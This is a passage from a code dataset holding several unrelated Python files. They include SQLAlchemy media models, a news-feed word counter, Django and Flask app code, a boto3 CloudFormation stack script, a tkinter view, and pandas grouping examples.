delete\",\n# uselist=False))\n\n# def __repr__(self):\n# fmt = ' source:{source}'\n# return fmt.format(\n# id=self.id,\n# movie=repr(self.movie),\n# source=repr(self.source))\n\n\nclass Episode(sautils.Base):\n __tablename__ = 'episode'\n __table_args__ = (\n schema.UniqueConstraint('series', 'modifier', 'season', 'number'),\n )\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n series = Column(String, nullable=False)\n modifier = Column(String, nullable=False, default='')\n season = Column(Integer, nullable=False)\n number = Column(Integer, nullable=False)\n\n # SELECTION_MODEL = EpisodeSelection\n\n def __init__(self, *args, modifier='', **kwargs):\n attrs = (\n 'series',\n 'season',\n 'number'\n )\n _init_check_required(kwargs, attrs)\n super().__init__(*args, modifier=modifier, **kwargs)\n\n def __eq__(self, other):\n attrs = (\n 'series',\n 'modifier',\n 'season',\n 'number'\n )\n return _eq_from_attrs(self, other, attrs)\n\n def __lt__(self, other):\n attrs = (\n 'series',\n 'modifier'\n 'season',\n 'number'\n )\n return _lt_from_attrs(self, other, attrs)\n\n def __repr__(self):\n return \"\".format(\n id=self.id or '??',\n oid=id(self),\n fmt=self.format())\n\n def __str__(self):\n return self.__unicode__()\n\n def __unicode__(self):\n return self.format()\n\n @orm.validates(\n 'series',\n 'modifier',\n 'season',\n 'number'\n )\n def validate(self, key, value):\n return self.normalize(key, value)\n\n @classmethod\n def normalize(cls, key, value):\n if key == 'series':\n value = value.lower()\n if not value:\n raise ValueError(value)\n\n elif key == 'modifier':\n value = str(value) if value is not None else ''\n\n elif key in ['season', 'number']:\n value = int(value)\n if value < 0:\n raise ValueError(value)\n\n else:\n raise NotImplementedError(key)\n\n return value\n\n def asdict(self):\n attrs = (\n 'series',\n 'modifier',\n 'season',\n 'number',\n )\n return _asdict_from_attrs(self, attrs)\n\n def format(self, fmt='{series_with_mod} s{season:02d} e{number:02d}',\n extra_data={}):\n d = self.asdict()\n\n if self.modifier:\n series_with_mod = \"{series} ({modifier})\"\n else:\n series_with_mod = \"{series}\"\n\n d['series_with_mod'] = series_with_mod.format(**d)\n d.update(**extra_data)\n\n try:\n return fmt.format(**d)\n except TypeError:\n pass\n\n\nclass Movie(sautils.Base):\n __tablename__ = 'movie'\n __table_args__ = (\n schema.UniqueConstraint('title', 'modifier'),\n )\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n title = Column(String, nullable=False)\n modifier = Column(String, nullable=False, default='')\n\n # SELECTION_MODEL = MovieSelection\n\n def __init__(self, *args, modifier='', **kwargs):\n attrs = (\n 'title',\n )\n _init_check_required(kwargs, attrs)\n super().__init__(*args, modifier=modifier, **kwargs)\n\n def __eq__(self, other):\n attrs = (\n 'title',\n 'modifier'\n )\n return _eq_from_attrs(self, other, attrs)\n\n def __lt__(self, other):\n attrs = (\n 'title',\n 'modifier'\n )\n return _lt_from_attrs(self, other, attrs)\n\n def __repr__(self):\n return \"\".format(\n id=self.id or '??',\n oid=id(self),\n fmt=self.format())\n\n def __str__(self):\n return self.__unicode__()\n\n def __unicode__(self):\n return self.format()\n\n @orm.validates(\n 'title',\n 'modifier'\n )\n def validate(self, key, value):\n return self.normalize(key, value)\n\n @classmethod\n def normalize(cls, key, value):\n if key == 'title':\n value = value.lower()\n if not value:\n raise ValueError(value)\n\n elif key == 'modifier':\n value = str(value) if value else ''\n\n else:\n raise NotImplementedError(key)\n\n return value\n\n def asdict(self):\n attrs = (\n 'title',\n 'modifier'\n )\n return _asdict_from_attrs(self, attrs)\n\n def format(self, fmt='{title_with_mod}', extra_data={}):\n d = self.asdict()\n\n if self.modifier:\n title_with_mod = \"{title} ({modifier})\"\n else:\n title_with_mod = \"{title}\"\n\n d['title_with_mod'] = title_with_mod.format(**d)\n d.update(**extra_data)\n\n return fmt.format(**d)\n\n\nclass Download(sautils.Base):\n __tablename__ = 'download'\n __table_args__ = (\n schema.UniqueConstraint('foreign_id'),\n )\n\n source_id = Column(Integer,\n ForeignKey(\"source.id\", ondelete=\"CASCADE\"),\n primary_key=True, nullable=False)\n source = orm.relationship(\"Source\",\n backref=orm.backref(\"download\",\n cascade=\"all, delete\",\n uselist=False))\n foreign_id = Column(String, nullable=False)\n state = Column(Integer, nullable=False)\n\n @classmethod\n def normalize(cls, key, value):\n if key in ('plugin', 'foreign_id'):\n if not isinstance(value, str):\n value = str(value)\n if value == '':\n raise ValueError(value)\n\n elif key == 'state':\n value = int(value)\n\n # valid_states = [\n # State.INITIALIZING,\n # State.QUEUED, State.PAUSED, State.DOWNLOADING,\n # State.SHARING, State.DONE, State.ARCHIVED]\n # if value not in valid_states:\n # raise ValueError(value)\n\n else:\n raise NotImplementedError(key)\n\n return value\n\n @orm.validates('plugin', 'foreign_id', 'state')\n def validate(self, key, value):\n return self.normalize(key, value)\n\n def __repr__(self):\n fmt = ''\n return fmt.format(id=id(self), state=self.state)\n # return fmt.format(id=id(self), state=STATE_SYMBOLS[self.state])\n\n# class Download(sautils.Base):\n# __tablename__ = 'download'\n\n# id = Column(Integer, primary_key=True)\n# state = Column(String(50))\n# type = Column(String(20))\n\n# __mapper_args__ = {\n# 'polymorphic_on': type,\n# # polymorphic_identity is not defined because this is an\n# # \"abstract base class\"\n# # 'polymorphic_identity': ''\n# }\n\n\n# class EpisodeDownload(Download):\n# __mapper_args__ = {\n# 'polymorphic_identity': 'episode'\n# }\n# episode_id = Column(Integer,\n# ForeignKey(Episode.id, ondelete=\"CASCADE\"),\n# nullable=True)\n# episode = orm.relationship(Episode,\n# uselist=False,\n# backref=orm.backref(\"download\",\n# uselist=False,\n# cascade_backrefs=False,\n# lazy='select'))\n\n\n# class MovieDownload(Download):\n# __mapper_args__ = {\n# 'polymorphic_identity': 'movie'\n# }\n\n# movie_id = Column(Integer,\n# ForeignKey(Movie.id, ondelete=\"CASCADE\"),\n# nullable=True)\n# movie = orm.relationship(Movie,\n# uselist=False,\n# backref=orm.backref(\"download\",\n# uselist=False,\n# cascade_backrefs=False,\n# lazy='select'))\n\n\ndef _init_check_required(kwargs, reqs):\n check = all([attr in kwargs for attr in reqs])\n\n if not check:\n err = (\"Insufficient arguments. \"\n \"Required: {req}, got: {got}\")\n err = err.format(req=', '.join(reqs),\n got=', '.join(kwargs.keys()))\n raise TypeError(err)\n\n\ndef _eq_from_attrs(a, b, attrs):\n if not isinstance(b, a.__class__):\n raise TypeError(b.__class__)\n\n try:\n return all([\n getattr(a, attr) == getattr(b, attr)\n for attr in attrs\n ])\n except AttributeError as e:\n raise TypeError(b) from e\n\n\ndef _lt_from_attrs(a, b, attrs):\n for attr in attrs:\n if not hasattr(a, attr):\n raise TypeError(a)\n\n if not hasattr(b, attr):\n raise TypeError(a)\n\n ret = getattr(a, attr).__lt__(getattr(b, attr))\n if ret != 0:\n return ret\n\n return 0\n\n\ndef _asdict_from_attrs(x, attrs):\n return {attr: getattr(x, attr, None) for attr in attrs}\n\n\ndef _entity_getter(x):\n entity_attrs = (\n 'episode',\n 'movie'\n )\n\n for attr in entity_attrs:\n value = getattr(x, attr, None)\n if value:\n return value\n\n return None\n\n\ndef _entity_setter(x, entity):\n entity_map = {\n Episode: 'episode',\n Movie: 'movie'\n }\n\n # Check for unknown entity type\n if entity is not None and entity.__class__ not in entity_map:\n raise TypeError(entity)\n\n # Set all entity-attributes correctly\n for (model, attr) in entity_map.items():\n value = entity if isinstance(entity, model) else None\n setattr(x, attr, value)\n","sub_path":"arroyo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":20749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240017000","text":"# в python3 такая строчка обычно не нужна\n# но если у вас специфичные настройки компьютера\n# может пригодиться\n# -*- coding: UTF-8 -*-\nimport json\nimport xml.etree.ElementTree as eTree\n\n\n# Удаляем из текста все HTML тэги и спецсимволы, такие как :/\\'\" .,()\ndef remove_html_tags(text):\n while text.find('<') > -1:\n open_tag = text.find('<')\n close_tag = text.find('>')\n text = '{} {}'.format(text[:open_tag], text[close_tag + 1:])\n return text.replace('(', '').replace(')', '').replace('.', '').replace('\"', '').replace('\\'', '') \\\n .replace('\\\\', '').replace('/', '').replace(',', '').replace(';', '').replace(':', '')\n\n\n# Чтение файла JSON\ndef read_json(filename, encoding): # Чтение файла JSON\n with open(filename, encoding=encoding) as news:\n data = (json.load(news))\n articles = data['rss']['channel']['item'] # Список со статьями\n text = ''\n for article in articles:\n article_text = article['description']\n if isinstance(article_text, dict):\n article_text = article_text[\"__cdata\"]\n text += remove_html_tags(article_text)\n return text\n\n\n# Чтение файла XML\ndef read_xml(filename, encoding):\n parser = eTree.XMLParser(encoding=encoding)\n tree = eTree.parse(filename, parser)\n root = tree.getroot()\n text = ''\n for item in root.iter('item'):\n article = item.find('description')\n article_text = remove_html_tags(article.text)\n text += article_text\n return text\n\n\n# Вывод результатов в консоль\ndef print_results(filename, top_10):\n print('Топ-10 слов в файле {}'.format(filename))\n for word, count in top_10:\n print('{:20}: {} раз '.format(word, count))\n print('-' * 30)\n\n\n# Получение списка файлов и их обработка\ndef get_files(files, func):\n for file in files:\n text = func(file['filename'], file['encoding'])\n words = text.split()\n words_count = {}\n for word in words:\n if len(word) > 6:\n words_count[word] = words_count.get(word, 0) + 1\n top_10 = sorted(words_count.items(), key=lambda x: x[1], reverse=True)[:10]\n print_results(file['filename'], top_10)\n\n\nfiles_json = [\n {'filename': 'newsafr.json', 'encoding': \"utf8\"},\n {'filename': 'newsfr.json', 'encoding': \"iso8859_5\"},\n {'filename': 'newscy.json', 'encoding': \"koi8-r\"},\n {'filename': 'newsit.json', 'encoding': \"cp1251\"}\n]\nfiles_xml = [\n {'filename': 'newsafr.xml', 'encoding': \"cp1251\"},\n {'filename': 'newsfr.xml', 'encoding': \"iso8859_5\"},\n {'filename': 'newscy.xml', 'encoding': \"koi8-r\"},\n {'filename': 'newsit.xml', 'encoding': \"cp1251\"}\n]\n\nprint('Программа выводит Топ 10 наиболее встречающихся слов в файлах XML либо JSON')\nwhile True:\n print('Введите:\\n'\n '1 - чтобы вывести Топ 10 слов из файлов JSON\\n'\n '2 - чтобы вывести Топ 10 слов из файлов XML\\n'\n '0 - чтобы выйти из программы')\n choice = input()\n if choice == '1':\n get_files(files_json, read_json)\n continue\n elif choice == '2':\n get_files(files_xml, read_xml)\n continue\n elif choice == '0':\n break\n else:\n print('Введен неверный номер')\n continue\n","sub_path":"newsparser.py","file_name":"newsparser.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281559440","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSMS.context_processors\n\nModule contains get_user_info function for making global LOGGED_USER\nvariable in all templates.\n\n:copyright: (c) 2015 by Oleksii Omelchuk.\n:license: BSD.\n\"\"\"\n\nfrom django.http import HttpRequest\n\nfrom apps.mainteacher.models.teachers import Teachers\n\n\ndef get_user_info(request):\n \"\"\"Make global template variable LOGGED_USER\n from session user_id.\n \"\"\"\n try:\n logged_user = Teachers.objects.get(pk=request.session['teacher_id'])\n except KeyError:\n logged_user = None\n\n return {'LOGGED_USER': logged_user}\n","sub_path":"SMS/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95384342","text":"import sys\nimport os\nimport math\nfrom PIL import Image \nfrom PIL import ImageDraw\nfrom PIL import ImageFilter\n\nif __name__ == '__main__':\n args = sys.argv\n faces = ( \"x+\", \"x-\", \"y+\", \"y-\", \"z+\", \"z-\" )\n out_width = 1024\n start_x = 0\n img = Image.new('RGBA', [out_width*6, out_width], (0x00,0x00,0x00,0xff))\n for face in faces:\n srcimg = Image.open(face+\".png\", 'r')\n resized_img = srcimg.resize((out_width, out_width))\n clipboard = resized_img.crop((0, 0, out_width, out_width))\n img.paste(clipboard, (start_x, 0, start_x + out_width, out_width))\n start_x += out_width\n #end\n\n outdir = \".\"\n outpath = outdir + '/skybox.png'\n img.save(outpath);\n#EOF\n","sub_path":"Tools/stitch2.py","file_name":"stitch2.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"445723425","text":"import os\nfrom django.test import TestCase\nfrom corehq.apps.app_manager.const import APP_V2\nfrom corehq.apps.app_manager.models import Application, Module\nfrom corehq.apps.userreports.dbaccessors import delete_all_report_configs\nfrom corehq.apps.userreports.models import DataSourceConfiguration\nfrom corehq.apps.userreports.reports.builder.forms import ConfigureListReportForm\n\n\ndef read(rel_path):\n path = os.path.join(os.path.dirname(__file__), *rel_path)\n with open(path) as f:\n return f.read()\n\n\nclass ReportBuilderTest(TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.app = Application.new_app('domain', 'Untitled Application', application_version=APP_V2)\n module = cls.app.add_module(Module.new_module('Untitled Module', None))\n cls.form = cls.app.new_form(module.id, \"Untitled Form\", 'en', read(['data', 'forms', 'simple.xml']))\n cls.app.save()\n\n @classmethod\n def tearDownClass(cls):\n cls.app.delete()\n for config in DataSourceConfiguration.all():\n config.delete()\n delete_all_report_configs()\n\n def test_updating_out_of_date_report(self):\n \"\"\"\n Test that editing a report for an outdated data source creates a new data source.\n Data sources are tied to app version.\n \"\"\"\n\n # Make report\n builder_form = ConfigureListReportForm(\n \"Test Report\",\n self.app._id,\n \"form\",\n self.form.unique_id,\n existing_report=None,\n data={\n 'filters': '[]',\n 'columns': '[{\"property\": \"/data/first_name\", \"display_text\": \"first name\"}]',\n }\n )\n self.assertTrue(builder_form.is_valid())\n report = builder_form.create_report()\n first_data_source_id = report.config_id\n\n # Bump version of app by saving it\n self.app.save()\n\n # Modify the report\n builder_form = ConfigureListReportForm(\n \"Test Report\",\n self.app._id,\n \"form\",\n self.form.unique_id,\n existing_report=report,\n data={\n 'filters': '[]',\n 'columns': '[{\"property\": \"/data/first_name\", \"display_text\": \"first name\"}]',\n }\n )\n self.assertTrue(builder_form.is_valid())\n report = builder_form.update_report()\n second_data_source_id = report.config_id\n\n self.assertNotEqual(first_data_source_id, second_data_source_id)\n","sub_path":"corehq/apps/userreports/tests/test_report_builder.py","file_name":"test_report_builder.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"492981755","text":"import boto3\nimport sys\nimport os\nimport time\nfrom texttable import Texttable\n\ndef SG_Intuit_CIDR_SSH(profilename):\n\t#print(\"SG_Intuit_CIDR_SSH\")\n\t#client = boto3.client('cloudformation')\n\tif profilename:\n\t\tProfile_Session = boto3.session.Session(profile_name=profilename)\n\t\tclient = Profile_Session.client('cloudformation')\n\t\tProfilename = Profile_Session.profile_name\n\telse:\n\t\tprint(bcolors.WARNING,\"Profile argument is not given and Currently you are not logged into any profile, hence can't proceed and exiting the script\",bcolors.ENDC)\n\t\tsys.exit()\n\ttry:\n\t\tresponse = client.create_stack(\n\t\t StackName='intuit-cidr-ingress-tcp-22',\n\t\t TemplateURL='https://s3-us-west-2.amazonaws.com/286056532910-scripts/intuit-cidr-ingress.yml',\n\t\t Parameters=[\n\t\t {\n\t\t 'ParameterKey': 'Name',\n\t\t 'ParameterValue': 'intuit-cidr-ingress',\n\t\t },\n\t\t {\n\t\t 'ParameterKey': 'Port',\n\t\t 'ParameterValue': '22',\n\t\t },\n\t\t {\n\t\t 'ParameterKey': 'VpcId',\n\t\t 'ParameterValue': 'vpc-73703315',\n\t\t },\n\t\t ],\n\t\t)\n\t\t#print(response)\n\texcept Exception as error:\n\t\tprint(StackName,\" Stack is not created for the following reason\")\n\t\tprint(error)\n\t\tprint(\"\\n\")\n\t\tdelete = input(\"Do you like to Delete this existing Stack (y/N) : \")\n\t\tif delete == 'y' or delete == 'Y':\n\t\t\tdelete_stack(\"intuit-cidr-ingress-tcp-22\",profilename)\n\t\tsys.exit()\n\tprint(\"Stack with Name \\\"intuit-cidr-ingress-tcp-22\\\" is created\",)\n\tmonitor_stack('intuit-cidr-ingress-tcp-22',profilename)\n\n\ndef SG_Intuit_CIDR_HTTP():\n\tprint(\"SG_Intuit_CIDR_HTTP\")\n\ndef SG_Intuit_CIDR_HTTPS():\n\tprint(\"SG_Intuit_CIDR_HTTPS\")\n\ndef SG_Intuit_APIGW_CIDR_HTTPS():\n\tprint(\"SG_Intuit_APIGW_CIDR_HTTPS\")\n\ndef monitor_stack(Stack_Name,profilename):\n\tif profilename:\n\t\tProfile_Session = boto3.session.Session(profile_name=profilename)\n\t\tclient = Profile_Session.client('cloudformation')\n\t\tProfilename = Profile_Session.profile_name\n\telse:\n\t\tprint(bcolors.WARNING,\"Profile argument is not given and Currently you are not logged into any profile, hence can't proceed and exiting the script\",bcolors.ENDC)\n\t\tsys.exit()\n\ttry:\n\t\twhile True:\n\t\t\tresponse = client.describe_stack_events(\n\t\t\t\tStackName=Stack_Name,\n\t\t\t)\n\t\t\tList = []\n\t\t\tList = [['Stack_Id', 'Stack_Name', 'Resource_Status', 'Resource_Status_Reason']]\n\t\t\tprint(response['StackEvents'][0]['ResourceStatus'])\n\t\t\tList.append([response['StackEvents'][0]['StackId'],response['StackEvents'][0]['StackName'], response['StackEvents'][0]['ResourceStatus'], response['StackEvents'][0]['ResourceStatusReason']])\n\t\t\tt = Texttable()\n\t\t\tt.add_rows(List)\n\t\t\tprint(t.draw())\n\t\t\tresp = client.describe_stacks(\n\t\t\t\tStackName=Stack_Name,\n\t\t\t)\n\t\t\tStackStatus = resp['Stacks'][0]['StackStatus']\n\t\t\tif StackStatus == 'ROLLBACK_COMPLETE' or StackStatus == 'CREATE_FAILED' or StackStatus == 'CREATE_COMPLETE':\n\t\t\t\tprint(\"Current status of the Stack is \",StackStatus)\n\texcept Exception as error:\n\t\tprint(error)\n\n\ndef delete_stack(Stack_Name,profilename):\n\tif Stack_Name == '':\n\t\tStack_Name = input(\"Enter the Stack Name : \")\n\tif profilename:\n\t\tProfile_Session = boto3.session.Session(profile_name=profilename)\n\t\tclient = Profile_Session.client('cloudformation')\n\t\tProfilename = Profile_Session.profile_name\n\telse:\n\t\tprint(bcolors.WARNING,\"Profile argument is not given and Currently you are not logged into any profile, hence can't proceed and exiting the script\",bcolors.ENDC)\n\t\tsys.exit()\n\ttry:\t\n\t\tresponse = client.delete_stack(\n\t\t StackName=Stack_Name\n\t\t)\n\t\tprint(Stack_Name,\" is deleted successfully\")\n\texcept Exception as error:\n\t\tprint(error)\n\t\tprint(\"Unable to delete stack - \",Stack_Name)\n\ndef main():\n\tProfile = sys.argv[1]\n\twhile True:\t\n#\t\tos.system('clear')\n\t\tprint(\"1. Create Stack - Security Group with Intuit CIDR for SSH\")\n\t\tprint(\"2. Create Stack - Security Group with Intuit CIDR for HTTP\")\n\t\tprint(\"3. Create Stack - Security Group with Intuit CIDR for HTTPS\")\n\t\tprint(\"4. Create Stack - Security Group with Intuit API GW CIDR for HTTPS\")\n\t\tprint(\"5. Delete Stack of your Choice\")\n\t\tprint(\"6. Exit\")\n\t\tprint(\"\\n\")\n\t\tchoice = input(\"Enter Your Choice : \")\n\t\tif choice == '1':\n\t\t\tSG_Intuit_CIDR_SSH(Profile)\n\t\t\tbreak\n\t\telif choice == '2':\n\t\t\tSG_Intuit_CIDR_HTTP()\n\t\telif choice == '3':\n\t\t\tSG_Intuit_CIDR_HTTPS()\n\t\telif choice == '4':\n\t\t\tSG_Intuit_APIGW_CIDR_HTTPS()\n\t\telif choice == '5':\n\t\t\tdelete_stack('',Profile)\n\t\telif choice == '6':\n\t\t\tprint(\"Thank you for using the Script\")\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Wrong Choice\")\n\t\t\ttime.sleep('5')\n\t\t\tcontinue\n\n\nif __name__ == '__main__' :\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint('')\n\t\tprint('\\033[1m' + '\\nKeyboard Interruption..Calm Down')\n\t\tprint('\\033[1m' + '\\nExiting !!!!\\n')\n\t\tprint('\\033[0m')\n\t\tsys.exit()","sub_path":"boto3/scripts/Trigger_v1.0.py","file_name":"Trigger_v1.0.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339285959","text":"import tkinter as tk\nimport collections\n\nimport View.ViewConfigs as sViewConfigs\nimport View.TkVariables as sVariables\nimport View.WidgetManager as sWidgetManager\n\nimport View.RootManager as mRootManager\nimport View.TextManager as mTextManager\nimport View.FileManager as mFileManager\nimport View.MessageManager as mMsgManager\nimport View.ManagerBus as mManagerBus\nimport View.MainFrameManager as mMainFrameManager\nimport View.ShortCutManager as mShortCutManager\nimport View.MenuManager as mMenuManager\n\nclass View():\n def __init__(self):\n self._variables = sVariables.TkVariables.getInstance()\n self._viewConfigs = sViewConfigs.ViewConfigs.getInstance()\n self._widgetManager = sWidgetManager.WidgetManager.getInstance()\n\n self._managers= collections.OrderedDict()\n\n def createWindow(self):\n self._createManagers()\n\n self._configTkVariables()\n self._configViewConfigs()\n self._configManagers()\n\n def _createManagers(self):\n self._managers[\"root\"] = mRootManager.RootManager()\n\n self._managers[\"bus\"] = mManagerBus.ManagerBus()\n\n self._managers[\"message\"] = mMsgManager.MessageManager()\n\n self._managers[\"file\"] = mFileManager.FileManager()\n\n self._managers[\"menu\"] = mMenuManager.MenuManager()\n\n self._managers[\"shortCut\"] = mShortCutManager.ShortCutManager()\n\n self._managers[\"mainFrame\"] = mMainFrameManager.MainFrameManager()\n\n self._managers[\"text\"] = mTextManager.TextManager(True)\n\n self._managers[\"output\"] = mTextManager.TextManager(False)\n\n def _configViewConfigs(self):\n self._viewConfigs.setConfigs(self._managers)\n\n def _configTkVariables(self):\n for name in (\"enableLineNum\", \"enableCursorInfo\", \"enableHighlightCurrentLine\"):\n self._variables.createInt(name)\n\n for name in (\"themes\",):\n self._variables.createString(name)\n\n def _configManagers(self):\n for k, v in self._managers.items():\n try:\n v.configure(self._managers)\n except:\n print(\"config error: {0}\".format(k))\n\n def showWindow(self):\n win = self._widgetManager.get(\"Root\")\n\n win.mainloop()\n","sub_path":"View/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27903185","text":"'''\npandas分组与聚合\n'''\nimport pandas as pd\nimport numpy as np\nsales = [{'account': 'Jones LLC','type':'a', 'Jan': 150, 'Feb': 200, 'Mar': 140},\n {'account': 'Alpha Co','type':'b', 'Jan': 200, 'Feb': 210, 'Mar': 215},\n {'account': 'Blue Inc','type':'a', 'Jan': 50, 'Feb': 90, 'Mar': 95 }]\ndf = pd.DataFrame(sales)\n# print(df.groupby('type').groups)\n# >>> {'b': Int64Index([1], dtype='int64'), 'a': Int64Index([0, 2], dtype='int64')}\n# for a,b in df.groupby('type'): #打印分组信息\n# print(a)\n# print(b)\n\n# res = df.groupby('type').aggregate({'type':'count', 'Feb':'sum'})\n# 按照'type'分为a,b两组,以a,b别作为行索引,将分组的'type'列求个数作为第一列,'Feb'列求和作为第二列,\n# print(res)\n# >>>:\n# Feb type\n# type\n# a 290 2\n# b 210 1\ngroup=['x','y','z']\ndata=pd.DataFrame({\n \"group\":[group[x] for x in np.random.randint(0,len(group),10)] ,\n \"salary\":np.random.randint(5,50,10),\n \"age\":np.random.randint(15,50,10)\n })\nprint(data)\n# res = data.groupby('group').agg('mean') # 以'group'分组,求各组的年龄和薪资平均值\n# print(res)\n\n# res = data.groupby('group').mean().to_dict() # 等价与上面\n# print(res)\n\n# res = data.groupby('group').transform('mean')\n# print(res)\n\nres = pd.pivot_table(data,\n values='salary',\n columns='group',\n index='age',\n aggfunc='count',\n margins=True\n ).reset_index()\nprint(res)\n","sub_path":"week04/section7.py","file_name":"section7.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448080300","text":"from flask import Flask, render_template, request, flash, session, redirect, url_for, Blueprint, request, jsonify\nfrom flask_login import login_required, login_user, logout_user, current_user\nfrom Scheduler.model import db, Announcement\nfrom Scheduler.forms import AnnouncementForm\nfrom Scheduler.decorators import admin_required\nfrom sqlalchemy import func\nfrom sqlalchemy import and_\nimport datetime\nimport calendar\nimport sys\n\nannouncement = Blueprint('announcement', __name__, template_folder='templates')\n\ndef create_announcement(title, author, body):\n newAnnouncement = Announcement(title, author, body)\n db.session.add(newAnnouncement)\n db.session.commit()\n return newAnnouncement\n\ndef delete_announcement(id):\n announcement = Announcement.query.filter_by(id=id).first()\n db.session.delete(announcement)\n db.session.commit()\n\n@announcement.route('/announcements')\ndef announcements():\n announcements = Announcement.query.all()\n list.reverse(announcements)\n if len(announcements) > 0:\n return render_template('announcements.html', announcements=announcements)\n else:\n msg = 'No Announcements Found'\n return render_template('announcements.html', msg=msg)\n\n@announcement.route('/announcement//')\ndef view_announcement(id):\n announcement = Announcement.query.filter_by(id=id).first()\n return render_template('announcement.html', announcement=announcement)\n\n@announcement.route('/add_announcement', methods=['GET', 'POST'])\n@admin_required\ndef add_announcement():\n form = AnnouncementForm(request.form)\n if form.validate_on_submit():\n create_announcement(form.title.data, session['username'], form.body.data)\n flash('Announcement created!', 'success')\n return redirect(url_for('regular.dashboard'))\n return render_template('add_announcement.html', form=form)\n\n@announcement.route('/edit_announcement//', methods=['GET', 'POST'])\n@admin_required\ndef edit_announcement(id):\n announcement = Announcement.query.filter_by(id=id).first()\n form = AnnouncementForm(request.form)\n form.title.data = announcement.title\n form.body.data = announcement.body\n\n if form.validate_on_submit():\n delete_announcement(announcement.id)\n title = request.form['title']\n body = request.form['body']\n\n create_announcement(title, session['username'], body)\n\n flash('Announcement edited!', 'success')\n \n return redirect(url_for('regular.dashboard'))\n return render_template('edit_announcement.html', form=form)\n\n@announcement.route('/delete_announcement//')\n@admin_required\ndef delete_route(id):\n delete_announcement(id)\n flash('Announcement Deleted!', 'success')\n return redirect(url_for('regular.dashboard'))","sub_path":"Scheduler/announcement.py","file_name":"announcement.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498376433","text":"import check\nimport info\nimport variables\n#from dateutil import parser\n\ndef setVariablesFromArgs(args):\n\t\n\tvariables.files = list(args.file)\n\n\tif args.EffectParams is not None:\n\t\t\tvariables.Settings = list(args.EffectParams)\n\n\tif args.TimeFormat == None and variables.TimeFormat == None:\n\t\tvariables.TimeFormat = \"[%Y/%m/%d %H:%M:%S]\"\n\telif args.TimeFormat is not None:\n\t\tvariables.TimeFormat = args.TimeFormat\n\n\tif not args.YMax == None: \n\t\ttry:\n\t\t\tvariables.YMax = check.MAX_TYPE(args.YMax)\n\t\texcept:\n\t\t\tinfo.err(\"YMax of value <\" + args.YMax + \"> is invalid.\")\n\ttry:\n\t\tvariables.YMin = check.MIN_TYPE(args.YMin)\n\texcept:\n\t\tinfo.err(\"YMin of value <\" + args.YMin + \"> is invalid.\")\n\n\tif args.Speed is not None and args.Time is not None and args.FPS is not None:\n\t\tinfo.err(\"Set only two of the following: [FPS] [Speed] [Time]\")\n\n\tif args.Speed is not None and (check.is_int(args.Speed) or check.is_float(args.Speed)):\n\t\tvariables.Speed = args.Speed\n\n\tif args.Time is not None and (check.is_int(args.Time) or check.is_float(args.Time)):\n\t\tvariables.Time = args.Time\n\n\tif args.FPS is not None and (check.is_int(args.FPS) or check.is_float(args.FPS)):\n\t\tvariables.FPS = args.FPS\n\n\tif args.Legend is not None:\n\t\tvariables.Legend = args.Legend\n\n\tif args.Name is not None:\n\t\tvariables.Name = args.Name.rstrip('/')\n\telse:\n\t\tvariables.Name = variables.tmpdir\n\n\tif variables.Speed is not None and variables.Time is not None and variables.FPS is not None:\n\t\tinfo.err(\"There has been set all of the following by combining config file and args: [FPS] [Speed] [Time]\")\n\n\tif variables.FPS is not None and variables.Time is not None:\n\t\tvariables.Speed = 1\n\n\tinfo.info(\"Params from command line set succesfully.\")\n\n\ndef setVar(name, value):\n\tif name.lower() == \"timeformat\":\n\t\t# should check the format validity\n\t\tvariables.TimeFormat = value\n\n\telif name.lower() == \"ymin\":\n\t\ttry:\n\t\t\tvariables.YMin = check.MIN_TYPE(value)\n\t\texcept:\n\t\t\tinfo.err(\"YMin of value <\" + value + \"> in config file is invalid.\")\n\n\telif name.lower() == \"ymax\":\n\t\ttry:\n\t\t\tvariables.YMax = check.MAX_TYPE(value)\n\t\texcept:\n\t\t\tinfo.err(\"YMax of value <\" + value + \"> in config file is invalid.\")\n\n\telif name.lower() == \"speed\":\n\t\tif variables.Time is not None and variables.FPS is not None:\n\t\t\tinfo.err(\"Speed is already set by setting the Time and FPS.\")\n\t\t\t\t\n\t\tif check.is_int(value) or check.is_float(value):\n\t\t\tvariables.Speed = value\n\t\telse:\n\t\t\tinfo.err(\"Speed value is not numeric.\")\n\n\telif name.lower() == \"time\":\n\t\tif variables.Speed is not None and variables.FPS is not None:\n\t\t\tinfo.err(\"Time is already set by setting the Speed and FPS.\")\n\t\t\t\t\n\t\tif check.is_int(value) or check.is_float(value):\n\t\t\tvariables.Time = value\n\t\telse:\n\t\t\tinfo.err(\"Time value is not numeric.\")\n\telif name.lower() == \"fps\":\n\t\tif variables.Time is not None and variables.Speed is not None:\n\t\t\tinfo.err(\"FPS is already set by setting the Time and Speed.\")\n\t\t\t\n\t\tif check.is_int(value) or check.is_float(value):\n\t\t\tvariables.FPS = value\n\t\telse:\n\t\t\tinfo.err(\"FPS value is not numeric.\")\n\t\n\telif name.lower == \"legend\":\n\t\tvariables.Legend = 